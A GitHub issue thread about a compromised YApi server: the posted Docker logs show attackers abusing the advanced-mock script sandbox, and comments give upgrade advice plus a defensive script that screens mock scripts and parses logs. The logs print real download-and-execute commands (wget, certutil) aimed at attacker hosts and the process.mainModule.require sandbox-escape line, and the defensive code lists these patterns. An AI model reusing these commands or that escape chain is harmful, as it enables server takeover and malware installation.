YMFE / yapi

YApi 是一个可本地部署的、打通前后端及QA的、可视化的接口管理平台
http://yapi.smart-xwork.cn/
Apache License 2.0

Possible vulnerability #2252

Open Thetiso opened 3 years ago

Thetiso commented 3 years ago

I installed yapi following a Zhihu article; here is the link: https://zhuanlan.zhihu.com/p/276312100 . Earlier I ran into the problem of the server's outbound traffic surging, and I didn't know whether yapi was to blame. This morning I found that the service had died on its own, so I took a look at the logs.

Two problems:

```
docker logs -f yapi

Error: write EPIPE
    at WriteWrap.onWriteComplete [as oncomplete] (internal/stream_base_commons.js:83:16)
Connecting to 2w.kacdn.cn (27.50.49.62:80)
wget: error getting response: Connection reset by peer
chmod: 20000: No such file or directory
/bin/sh: ./20000: not found
error: child_process.js:660
    throw err;
    ^

Error: Command failed: id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000
Connecting to 2w.kacdn.cn (27.50.49.62:80)
wget: error getting response: Connection reset by peer
chmod: 20000: No such file or directory
/bin/sh: ./20000: not found
    at checkExecSyncError (child_process.js:621:11)
    at Object.execSync (child_process.js:657:15)
    at evalmachine.<anonymous>:6:56
    at Script.runInContext (vm.js:137:20)
    at Object.exports.sandbox (/api/vendors/server/utils/commons.js:288:10)
    at Object.exports.handleMockScript (/api/vendors/server/utils/commons.js:632:26)
    at Object.<anonymous> (/api/vendors/exts/yapi-plugin-advanced-mock/server.js:210:18)
    at processTicksAndRejections (internal/process/task_queues.js:85:5)
    at async Promise.all (index 0)
    at async module.exports (/api/vendors/server/middleware/mockServer.js:334:7) {
  status: 127,
  signal: null,
  output: [ null, <Buffer 75 69 64 3d 30 28 72 6f 6f 74 29 20 67 69 64 3d 30 28 72 6f 6f 74 29 20 67 72 6f 75 70 73 3d 30 28 72 6f 6f 74 29 2c 31 28 62 69 6e 29 2c 32 28 64 61 ... 80 more bytes>, <Buffer 43 6f 6e 6e 65 63 74 69 6e 67 20 74 6f 20 32 77 2e 6b 61 63 64 6e 2e 63 6e 20 28 32 37 2e 35 30 2e 34 39 2e 36 32 3a 38 30 29 0a 77 67 65 74 3a 20 65 ... 116 more bytes> ],
  pid: 17,
  stdout: <Buffer 75 69 64 3d 30 28 72 6f 6f 74 29 20 67 69 64 3d 30 28 72 6f 6f 74 29 20 67 72 6f 75 70 73 3d 30 28 72 6f 6f 74 29 2c 31 28 62 69 6e 29 2c 32 28 64 61 ... 80 more bytes>,
  stderr: <Buffer 43 6f 6e 6e 65 63 74 69 6e 67 20 74 6f 20 32 77 2e 6b 61 63 64 6e 2e 63 6e 20 28 32 37 2e 35 30 2e 34 39 2e 36 32 3a 38 30 29 0a 77 67 65 74 3a 20 65 ... 116 more bytes>
}
Connecting to 117.24.13.169:664 (117.24.13.169:664)
x86_64 100% |****| 33832 0:00:00 ETA
(node:1) DeprecationWarning: collection.remove is deprecated. Use deleteOne, deleteMany, or bulkWrite instead.
Error: write EPIPE
    at WriteWrap.onWriteComplete [as oncomplete] (internal/stream_base_commons.js:83:16)
[json-schema-faker] calling JsonSchemaFaker() is deprecated, call either .generate() or .resolve()
Connecting to 27.50.49.61:1231 (27.50.49.61:1231)
X64 100% |****| 33832 0:00:00 ETA
Connecting to 2w.kacdn.cn (27.50.49.62:80)
wget: error getting response: Connection reset by peer
chmod: 20000: No such file or directory
/bin/sh: ./20000: not found
error: child_process.js:660
    throw err;
    ^

Error: Command failed: id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000
Connecting to 2w.kacdn.cn (27.50.49.62:80)
wget: error getting response: Connection reset by peer
chmod: 20000: No such file or directory
/bin/sh: ./20000: not found
    at checkExecSyncError (child_process.js:621:11)
    at Object.execSync (child_process.js:657:15)
    at evalmachine.<anonymous>:6:56
    at Script.runInContext (vm.js:137:20)
    at Object.exports.sandbox (/api/vendors/server/utils/commons.js:288:10)
    at Object.exports.handleMockScript (/api/vendors/server/utils/commons.js:632:26)
    at Object.<anonymous> (/api/vendors/exts/yapi-plugin-advanced-mock/server.js:210:18)
    at processTicksAndRejections (internal/process/task_queues.js:85:5)
    at async Promise.all (index 0)
    at async module.exports (/api/vendors/server/middleware/mockServer.js:334:7) {
  status: 127,
  signal: null,
  output: [ null, <Buffer 75 69 64 3d 30 28 72 6f 6f 74 29 20 67 69 64 3d 30 28 72 6f 6f 74 29 20 67 72 6f 75 70 73 3d 30 28 72 6f 6f 74 29 2c 31 28 62 69 6e 29 2c 32 28 64 61 ... 80 more bytes>, <Buffer 43 6f 6e 6e 65 63 74 69 6e 67 20 74 6f 20 32 77 2e 6b 61 63 64 6e 2e 63 6e 20 28 32 37 2e 35 30 2e 34 39 2e 36 32 3a 38 30 29 0a 77 67 65 74 3a 20 65 ... 116 more bytes> ],
  pid: 42,
  stdout: <Buffer 75 69 64 3d 30 28 72 6f 6f 74 29 20 67 69 64 3d 30 28 72 6f 6f 74 29 20 67 72 6f 75 70 73 3d 30 28 72 6f 6f 74 29 2c 31 28 62 69 6e 29 2c 32 28 64 61 ... 80 more bytes>,
  stderr: <Buffer 43 6f 6e 6e 65 63 74 69 6e 67 20 74 6f 20 32 77 2e 6b 61 63 64 6e 2e 63 6e 20 28 32 37 2e 35 30 2e 34 39 2e 36 32 3a 38 30 29 0a 77 67 65 74 3a 20 65 ... 116 more bytes>
}
(node:1) UnhandledPromiseRejectionWarning: TypeError: Cannot read property 'name' of null
    at /api/vendors/server/controllers/interface.js:285:51
(node:1) UnhandledPromiseRejectionWarning: Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). (rejection id: 1)
(node:1) [DEP0018] DeprecationWarning: Unhandled promise rejections are deprecated. In the future, promise rejections that are not handled will terminate the Node.js process with a non-zero exit code.
[json-schema-faker] calling JsonSchemaFaker() is deprecated, call either .generate() or .resolve()
[json-schema-faker] calling JsonSchemaFaker() is deprecated, call either .generate() or .resolve()
[json-schema-faker] calling JsonSchemaFaker() is deprecated, call either .generate() or .resolve()
log: -------------------------------------swaggerSyncUtils constructor-----------------------------------------------
log: 服务已启动,请打开下面链接访问: http://127.0.0.1:3000/
log: mongodb load success...
(node:1) [DEP0066] DeprecationWarning: OutgoingMessage.prototype._headers is deprecated
(node:1) DeprecationWarning: collection.update is deprecated. Use updateOne, updateMany, or bulkWrite instead.
(node:1) UnhandledPromiseRejectionWarning: TypeError: Cannot read property 'name' of null
    at /api/vendors/server/controllers/interface.js:285:51
(node:1) UnhandledPromiseRejectionWarning: Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). (rejection id: 1)
(node:1) [DEP0018] DeprecationWarning: Unhandled promise rejections are deprecated. In the future, promise rejections that are not handled will terminate the Node.js process with a non-zero exit code.
error: evalmachine.<anonymous>:6
mockjson = process.mainModule.require("child_process").execSync("certutil -urlcache -split -f http://139.162.106.252/nlbn.exe d:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

SyntaxError: Invalid or unexpected token
    at new Script (vm.js:86:7)
    at Object.exports.sandbox (/api/vendors/server/utils/commons.js:286:12)
    at Object.exports.handleMockScript (/api/vendors/server/utils/commons.js:632:26)
    at module.exports (/api/vendors/server/middleware/mockServer.js:331:22)
    at processTicksAndRejections (internal/process/task_queues.js:85:5)
2021/07/09 12:58:48 exit status 1 from execoutput
running!!!child_process.js:660
    throw err;
    ^

Error: spawnSync /bin/sh ENOBUFS
    at Object.spawnSync (internal/child_process.js:1041:20)
    at spawnSync (child_process.js:607:24)
    at Object.execSync (child_process.js:652:15)
    at WriteStream.<anonymous> (evalmachine.<anonymous>:27:49)
    at WriteStream.emit (events.js:208:15)
    at finishMaybe (_stream_writable.js:644:14)
    at _stream_writable.js:622:5
    at WriteStream._final (internal/fs/streams.js:280:3)
    at callFinal (_stream_writable.js:615:10)
    at processTicksAndRejections (internal/process/task_queues.js:77:11) {
  errno: 'ENOBUFS',
  code: 'ENOBUFS',
  syscall: 'spawnSync /bin/sh',
  path: '/bin/sh',
  spawnargs: [ '-c', '.git/kworkers' ],
  error: [Circular],
  status: 0,
  signal: null,
  output: [ null, <Buffer 2f 61 70 69 2f 76 65 6e 64 6f 72 73 2f 2e 67 69 74 0a 77 6f 72 6b 69 6e 67 20 64 69 72 20 2f 61 70 69 2f 76 65 6e 64 6f 72 73 20 66 72 6f 6d 20 70 69 ... 1048480 more bytes>, <Buffer 32 30 32 31 2f 30 37 2f 30 39 20 31 32 3a 35 38 3a 34 38 20 65 78 69 74 20 73 74 61 74 75 73 20 31 20 66 72 6f 6d 20 65 78 65 63 6f 75 74 70 75 74 0a ... 10 more bytes> ],
  pid: 26,
  stdout: <Buffer 2f 61 70 69 2f 76 65 6e 64 6f 72 73 2f 2e 67 69 74 0a 77 6f 72 6b 69 6e 67 20 64 69 72 20 2f 61 70 69 2f 76 65 6e 64 6f 72 73 20 66 72 6f 6d 20 70 69 ... 1048480 more bytes>,
  stderr: <Buffer 32 30 32 31 2f 30 37 2f 30 39 20 31 32 3a 35 38 3a 34 38 20 65 78 69 74 20 73 74 61 74 75 73 20 31 20 66 72 6f 6d 20 65 78 65 63 6f 75 74 70 75 74 0a ... 10 more bytes>
}
```

I went back and checked the saved Chrome settings: I had forgotten to change the admin default password, which probably takes a large share of the blame.

jessezhang001 commented 3 years ago

Just install the latest version. I recommend the YApi Pro version ( https://github.com/yapi-pro/yapi ), which fixes the installation errors and also provides docker-based deployment.

xufengnian commented 3 years ago

Obviously you've been hit: the execSync call is the malicious command being run. If your server is a Windows box it has simply been taken over; if it's Linux, check as soon as possible whether there is any abnormal crontab.
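The stack trace above shows the advanced-mock script reaching `child_process` through `process.mainModule.require` from inside `vm.runInContext`. Below is an added example, not YApi's own code, of two defender-side checks: auditing stored mock scripts for that escape chain, and extracting the executed commands and contacted hosts from the container log. The function names, the denylist and the sample log are constructed for this example.

```javascript
// Added example, not YApi's own code: two defender-side checks for the incident above.
// auditMockScript() screens an "advanced mock" script for the escape chain seen in the log
// (process.mainModule.require -> child_process.execSync) so scripts stored in YApi's MongoDB
// can be audited before vm.runInContext runs them; extractSandboxCommands() pulls the shell
// commands and contacted hosts out of `docker logs yapi` text ("Command failed:" / "Connecting to").
// Function names, the denylist and the sample data are assumptions made for this example.

const MOCK_SCRIPT_DENYLIST = [
  { rule: "process-escape", re: /\bprocess\s*\.\s*(mainModule|binding)\b/ },
  { rule: "require-call",   re: /\brequire\s*\(\s*["'`][^"'`]+["'`]\s*\)/ },
  { rule: "child_process",  re: /\bchild_process\b/ },
  { rule: "exec-call",      re: /\b(execSync|spawnSync|execFileSync|exec|spawn)\s*\(/ },
];

// Returns every rule that fires, with the matched text; [] means clean under this screen.
function auditMockScript(source) {
  const hits = [];
  for (const { rule, re } of MOCK_SCRIPT_DENYLIST) {
    const m = re.exec(source);
    if (m) hits.push({ rule, snippet: m[0] });
  }
  return hits;
}

// Returns { commands, hosts } found in raw log text (one log record per line).
function extractSandboxCommands(logText) {
  const commands = new Set();
  const hosts = new Set();
  for (const line of logText.split("\n")) {
    const cmd = /Command failed: (.+)$/.exec(line);
    if (cmd) commands.add(cmd[1].trim());
    const host = /Connecting to ([^\s(:]+)/.exec(line); // host or IP, port dropped
    if (host) hosts.add(host[1]);
  }
  return { commands: [...commands], hosts: [...hosts] };
}

// Constructed sample input modelled on the log in this issue; hosts are placeholders.
const SAMPLE_LOG = [
  "Error: Command failed: id;wget http://dl.example/20000;chmod 777 20000;./20000",
  "Connecting to dl.example (203.0.113.10:80)",
  "    at Object.execSync (child_process.js:657:15)",
  "    at evalmachine.<anonymous>:6:56",
  "    at Object.exports.handleMockScript (/api/vendors/server/utils/commons.js:632:26)",
  "Connecting to 198.51.100.7:664 (198.51.100.7:664)",
].join("\n");

// A planted script shaped like the one in the log, and a benign one for contrast.
const PLANTED_SCRIPT = 'mockJson = process.mainModule.require("child_process").execSync("id");';
const BENIGN_SCRIPT = "mockJson.id = Math.floor(Math.random() * 1000); mockJson.ok = true;";
```

Running `auditMockScript` over every advanced-mock script in the database gives a quick inventory of planted scripts; the host list from `extractSandboxCommands` is what you would hand to whoever is checking outbound traffic.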

jessezhang001 commented 3 years ago

Use the yapi-pro-cli provided by YApi Pro ( https://github.com/yapi-pro/yapi ) and upgrade to the latest version.

```shell
npm install -g yapi-pro-cli --registry https://registry.npm.taobao.org
yapi update
```

itwhat126 commented 3 years ago

I ran into the same kind of problem. I had installed the docker version before; after reinstalling, I again found that users of unknown origin had been registered.